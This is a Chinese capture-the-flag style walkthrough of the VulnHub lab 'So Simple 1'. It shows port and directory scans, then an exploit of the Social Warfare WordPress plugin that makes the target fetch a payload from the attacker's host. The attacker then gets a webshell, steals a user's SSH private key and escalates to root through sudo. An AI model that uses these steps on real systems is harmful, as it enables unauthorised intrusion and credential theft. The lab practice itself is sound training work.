Vulnhub 515 SO SIMPLE-1

考点：dirsearch,wordpress,sudo,id_rsa

靶机链接：https://www.vulnhub.com/entry/so-simple-1,515/

环境配置

名称	IP
Kali Linux	10.0.2.24
SIMPLE-1	10.0.2.30

初步打点

端口扫描

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
$ export rip=10.0.2.30
$ sudo nmap -v -A -p- $rip
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 5b:55:43:ef:af:d0:3d:0e:63:20:7a:f4:ac:41:6a:45 (RSA)
|   256 53:f5:23:1b:e9:aa:8f:41:e2:18:c6:05:50:07:d8:d4 (ECDSA)
|_  256 55:b7:7b:7e:0b:f5:4d:1b:df:c3:5d:a1:d7:68:a9:6b (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: So Simple
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.41 (Ubuntu)

WEB测试

dirsearch

1
2
3
$ dirsearch -u http://10.0.2.30                    
[05:09:36] 200 -   13KB - /wordpress/ 
[05:09:36] 200 -    5KB - /wordpress/wp-login.php

看来是搞wordpress了

漏洞发现

1
$ wpscan --url http://10.0.2.30/wordpress/ --api-token ******************************************* 

参考WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution

获得权限

getwebshell

kali上开web服务

1
$ python -m 'http.server' 80

1
$ python2  46794.py -t http://10.0.2.30/wordpress/ -p http://10.0.2.24/CVE/CVE-2019-9978 

执行后访问shell地址返回200，使用antsword连接成功

获得id_rsa

发现/home/max/.ssh/目录可访问，下载id_rsa文件成功

ssh远程访问成功

提权

可免密执行service，GTFOBins一把梭

成功切换用户

继续查看sudo -l，发现可免密执行/opt/tools/server-health.sh，但是这个文件不存在，只好自己新建写入了，运行获得root

最后修改于 2020-07-17